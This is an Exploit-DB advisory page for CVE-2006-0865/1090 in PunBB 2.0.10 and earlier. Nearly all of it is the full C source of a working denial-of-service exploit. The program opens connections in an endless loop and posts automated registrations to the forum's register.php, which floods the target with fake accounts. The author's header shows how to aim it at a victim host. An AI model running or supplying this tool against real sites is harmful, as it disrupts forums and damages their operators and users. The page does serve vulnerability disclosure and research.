PunBB <= 2.0.10 - Register Multiple Users Denial of Service Exploit

2006-02-20T00:00:00
ID EDB-ID:1517
Type exploitdb
Reporter K4P0
Modified 2006-02-20T00:00:00

Description

PunBB. CVE-2006-0865,CVE-2006-1090. Dos exploit for php platform

                                        
                                            /*
  Name: NST-Exploit Punbb 2.0.10 Denial Of Service
  Copyright: NeoSecurity
  Author: K4P0
    
  [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/
  
  #################################################
  PunBB 2.0.10 Denial of Service exploit by K4P0  
  Use only at your own reputation risk! ;)        

  www.NeoSecurityTeam.net                         
  #################################################

  [1] - Trying if connection is possible...
  [2] - Connected!
  [3] - Flooding localhost...
  
  Use it at your own risk!.
*/

#define WINDOWS
//#define LINUX

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WINDOWS
#include <winsock2.h>
#include <windows.h>
// Link to (lib)ws2_32.a
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#endif

#define NST_ALIVE 1

int  Connect(char*);
void SendPack(int, int, char*, char*); 
void _perror(char*);
void HowTo(char*);

int main(int argc, char* argv[])
{
  int vict_sock, dos = 0;
  puts("#################################################");
  puts(" PunBB 2.0.10 Denial of Service exploit by K4P0  ");
  puts(" Use only at your own reputation risk! ;)        \n");
  puts(" www.NeoSecurityTeam.net                         ");
  if(argc < 4) HowTo(argv[0]);
  puts("#################################################\n");

  printf("[1] - Trying if connection is possible...\n", argv[1]);
  fflush(stdout);
  vict_sock = Connect(argv[2]);
  printf("[2] - Connected!\n");
  printf("[3] - Flooding %s", argv[1]);
  #ifdef WINDOWS
  closesocket(vict_sock);
  #else
  close(vict_sock);
  #endif
  
  while(NST_ALIVE)
  {
                         if(!(dos % 10)) fprintf(stderr, ".");
                         vict_sock = Connect(argv[2]);
                         SendPack(vict_sock, dos, argv[3], argv[1]);
                         dos++;
                         #ifdef WINDOWS
                         closesocket(vict_sock);
                         WSACleanup();
                         #else
                         close(vict_sock);
                         #endif
  }
  return 0;
}
// I'm to lazy to use gethostby(addr|name) :)
int Connect(char* IP)
{
    struct sockaddr_in *_addr;
    int vict_sck;
    
    #ifdef WINDOWS
    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    {
                              //WSAGetLastError()? Nah...
                              fprintf(stderr, "[*]   WSAStartup() failed");
                              exit(-1);
    }
    #endif
    
    if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in))))
    {
                     fprintf(stderr, "[*]   Unable to reserve memory");
                     exit(-1);
    }
      
    memset(_addr, 0x0, sizeof(struct sockaddr_in));
    _addr->sin_family = AF_INET;
    _addr->sin_port   = htons(80);
    _addr->sin_addr.s_addr = inet_addr(IP);
    
    #ifdef WINDOWS
    if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0)
    {
                 fprintf(stderr, "WSASocket() failed");
                 exit(-1);
    }
    else
    if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) 
                 _perror("socket() ");
    #endif
    
    if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0)
                 _perror("connect() "); 
    
    free(_addr);
    return vict_sck; 
}

void SendPack(int v_sck, int var, char* path, char* DNS)
{
     char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST;
     if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) ||
        !(HTTP_POST = (char *)malloc(512)))
     {
                    fprintf(stderr, "Error trying to reserver memory");
                    exit(-1);
     }
     sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n"
                        "Host: %s\n"
                        "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n"
                        "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"
                        "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n"
                        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"
                        "Keep-Alive: 300\n"
                        "Proxy-Connection: keep-alive\n"
                        "Referer: http://%s%sregister.php\n"
                        "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path);
                                                                            
     sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&"
                        "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var);
     
     sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST));
        
     strcat(HTTP_PACK, HTTP_MPCK);
     strcat(HTTP_PACK, HTTP_POST);
     send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0);
     
     free(HTTP_PACK);
     free(HTTP_MPCK);
     free(HTTP_POST);
     return;
}

void _perror(char* msg)
{
     perror(msg);
     fflush(stdout);
     exit(-1);
}

void HowTo(char* program)
{
     fprintf(stderr, "%s <DNS> <IP> <Path>\n", program);
     fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n");
     fprintf(stderr, "#################################################");
     exit(0);
}

// milw0rm.com [2006-02-20]